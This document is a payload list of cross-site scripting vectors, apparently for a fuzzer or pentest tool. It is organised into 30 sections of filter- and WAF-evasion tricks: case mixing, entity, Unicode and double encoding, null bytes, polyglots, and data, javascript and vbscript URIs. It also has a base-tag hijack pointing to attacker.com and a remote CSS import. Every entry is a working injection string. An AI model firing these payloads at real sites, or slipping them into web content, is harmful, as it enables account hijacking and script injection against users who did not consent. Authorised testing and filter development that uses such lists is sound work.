# AGGRESSIVE XSS PAYLOADS - MAXIMIZED FOR DETECTION AND EVASION
# Focused on: Reflection bypass, DOM injection, Event handlers, Encoding tricks, Filter evasion
# Last updated: Advanced polyglot and context-aware payloads

# ============================================================================
# SECTION 1: BASIC SCRIPT INJECTION (Direct & Case Variation)
# ============================================================================
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<ScRiPt>alert(1)</sCriPt>
<SCRIPT>alert(1)</SCRIPT>
<ScRiPt>alert('xss')</sCriPt>
<script>1337</script>
<script>document.write('xss')</script>

# ============================================================================
# SECTION 2: IMG/SVG EVENT HANDLERS (Highly reliable)
# ============================================================================
<img src=x onerror=alert(1)>
<img src=x onerror="alert(1)">
<img src=x onerror='alert(1)'>
<IMG SRC=x OnErRoR=alert(1)>
<img src=1 onerror=alert('XSS')>
<img src=@ onerror=alert(1)>
<img src=javascript:alert(1)>
<svg onload=alert(1)>
<svg onload="alert(1)">
<svg/onload=alert(1)>
<SvG OnLoAd=alert(1)>
<svg onload=alert(String.fromCharCode(88,83,83))>

# ============================================================================
# SECTION 3: IFRAME VECTORS
# ============================================================================
<iframe src="javascript:alert(1)">
<iframe src=javascript:alert(1)>
<IFrAmE src=javascript:alert(1)>
<iframe onload=alert(1)>
<iframe srcdoc="<script>alert(1)</script>">
<iframe/src="data:text/html,<script>alert(1)</script>">

# ============================================================================
# SECTION 4: BODY/HTML INJECTION
# ============================================================================
<body onload=alert(1)>
<body onload="alert(1)">
<html onmouseover=alert(1)>
<body onerror=alert(1)>

# ============================================================================
# SECTION 5: HTML ENTITY ENCODING (Bypass reflection detection)
# ============================================================================
&#60;script&#62;alert(1)&#60;/script&#62;
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;img src=x onerror=alert(1)&#62;
&lt;img src=x onerror=alert(1)&gt;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
&#x3C;img src=x onerror=alert(1)&#x3E;

# ============================================================================
# SECTION 6: UNICODE & EXTENDED ENCODING (Evade filters)
# ============================================================================
<script>\u0061lert(1)</script>
<script>\u0061lert('XSS')</script>
<img src=x onerror="\u0061lert(1)">
<svg onload="\u0061lert(1)">
<script>eval('\x61lert(1)')</script>
<img src=x onerror="\x61lert(1)">

# ============================================================================
# SECTION 7: NULL BYTE & WHITESPACE INJECTION (Parser confusion)
# ============================================================================
<img%00 src=x onerror=alert(1)>
<script%00>alert(1)</script>
<img src=x onerror%00=alert(1)>
<img src=x onerror&#00;=alert(1)>
<img src=x onload&#09;=alert(1)>
<img src=x onload&#10;=alert(1)>
<img src=x onload&#13;=alert(1)>
<img src=x onload	=alert(1)>

# ============================================================================
# SECTION 8: MIXED ENCODING (Case + Entity + Unicode)
# ============================================================================
<ScRiPt>&#97;lert(1)</sCriPt>
<IMG sRc=x oNeRrOr="&#97;&#108;&#101;&#114;&#116;(1)">
<svg OnLoAd="&#x61;&#x6c;&#x65;&#x72;&#x74;(1)">
<iMg src=x OnErRoR=\u0061lert(1)>

# ============================================================================
# SECTION 9: POLYGLOT & CONTEXT BREAKING
# ============================================================================
'" ><script>alert(1)</script>
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>
"><img src=x onerror=alert(1)>
--><script>alert(1)</script>
/*--></script><script>alert(1)</script>

# ============================================================================
# SECTION 10: COMMENT MANIPULATION (Bypass WAF/filter comments)
# ============================================================================
<script>/**/alert(1)</script>
<img src=x onerror="/**/alert(1)">
<svg onload="/**/alert(1)">
<!--<script>alert(1)</script>-->
<script><!--alert(1)--></script>

# ============================================================================
# SECTION 11: ALTERNATIVE ATTRIBUTE SYNTAX
# ============================================================================
<img src=x onmouseover=alert(1)>
<img src=x onmouseenter=alert(1)>
<img src=x onmousemove=alert(1)>
<img src=x onfocus=alert(1) autofocus>
<img src=x onclick=alert(1)>
<div onmouseover=alert(1)>X</div>
<body onmouseenter=alert(1)>X</body>

# ============================================================================
# SECTION 12: DATA URI SCHEMES (Bypass src-based filters)
# ============================================================================
<script src="data:text/javascript,alert(1)">
<iframe src="data:text/html,<script>alert(1)</script>">
<object data="data:text/html,<script>alert(1)</script>">
<embed src="data:text/html,<script>alert(1)</script>">

# ============================================================================
# SECTION 13: JAVASCRIPT PROTOCOL (Direct execution)
# ============================================================================
<a href="javascript:alert(1)">Click</a>
<a href="javascript:alert('XSS')">Click</a>
<a href="jAvAsCrIpT:alert(1)">Click</a>
<iframe src="javascript:alert(1)"></iframe>
<form action="javascript:alert(1)"><input type=submit>

# ============================================================================
# SECTION 14: VBSCRIPT PROTOCOL (IE legacy)
# ============================================================================
<a href="vbscript:alert(1)">Click</a>
<iframe src="vbscript:msgbox(1)"></iframe>

# ============================================================================
# SECTION 15: NEWLINE INSERTION (Break parsing)
# ============================================================================
<script>
alert(1)
</script>
<img src=x 
onerror=alert(1)>
<script>
&#97;lert(1)
</script>

# ============================================================================
# SECTION 16: TAB & SPECIAL WHITESPACE
# ============================================================================
<img	src=x	onerror=alert(1)>
<script>	alert(1)	</script>
<svg	onload=alert(1)>
<img src=x onerror=alert	(1)>

# ============================================================================
# SECTION 17: ATTRIBUTE MUTATION (Bypass parser edge cases)
# ============================================================================
<img src='x' onerror='alert(1)'>
<img src="x" onerror="alert(1)">
<img src=x onerror=alert(1)>
<img src=x onerror='alert(1)'>
<img src='x' onerror="alert(1)">

# ============================================================================
# SECTION 18: STYLE-BASED XSS (CSS injection)
# ============================================================================
<style>body{background:url('javascript:alert(1)')}</style>
<style>*{background:url('javascript:alert(1)')}</style>
<div style="background:url('javascript:alert(1)')">X</div>
<div style="behavior:url('xss.htc')">X</div>
<style>@import'http://x.com/xss.css';</style>

# ============================================================================
# SECTION 19: LINK & OBJECT VECTORS
# ============================================================================
<link rel=stylesheet href="javascript:alert(1)">
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<source src="javascript:alert(1)">

# ============================================================================
# SECTION 20: BASE TAG HIJACKING
# ============================================================================
<base href="javascript:alert(1)">
<base href="http://attacker.com/">

# ============================================================================
# SECTION 21: FORM ACTION INJECTION
# ============================================================================
<form action="javascript:alert(1)"><input type=submit></form>
<form action="data:text/html,<script>alert(1)</script>"><input type=submit></form>

# ============================================================================
# SECTION 22: META REFRESH
# ============================================================================
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0; url=javascript:alert(1)">

# ============================================================================
# SECTION 23: MARQUEE & DEPRECATED TAGS
# ============================================================================
<marquee onstart=alert(1)>
<marquee onstart='alert(1)'>
<marquee onstart="alert(1)">

# ============================================================================
# SECTION 24: COMPLEX POLYGLOTS (Multiple encoding layers)
# ============================================================================
"><svg onload=alert(1)><"
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
<svg onload=eval('alert\x28\x31\x29')>

# ============================================================================
# SECTION 25: ARROW FUNCTION & DYNAMIC CODE
# ============================================================================
<svg onload=eval(`alert(1)`)>
<img src=x onerror=eval(`alert(1)`)>
<script>(() => alert(1))()</script>

# ============================================================================
# SECTION 26: ATTRIBUTE BYPASS WITH SPECIAL CHARS
# ============================================================================
<img src=x onerror=alert(1) alt="">
<img src=x onerror=alert(1) title="">
<img src=x onerror=alert(1) id="test">
<img src=x onerror=alert(1) class="">

# ============================================================================
# SECTION 27: DOUBLE ENCODING (Bypass double decode filters)
# ============================================================================
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C/script%253E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

# ============================================================================
# SECTION 28: HYBRID VECTORS (HTML + CSS + JS)
# ============================================================================
<div><svg><script>alert(1)</script></svg></div>
<table><tr><td><script>alert(1)</script></td></tr></table>
<select><option><script>alert(1)</script></option></select>

# ============================================================================
# SECTION 29: DYNAMIC ATTRIBUTE ASSIGNMENT
# ============================================================================
<img src=x id=i onerror="eval(id.innerHTML)">
<div id=x>alert(1)</div><img src=x onerror="eval(x.innerHTML)">

# ============================================================================
# SECTION 30: SIMPLEST HIGH-SUCCESS PAYLOADS (Must-test)
# ============================================================================
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<script>alert('XSS')</script>
"><script>alert('XSS')</script>
'><img src=x onerror=alert('XSS')>
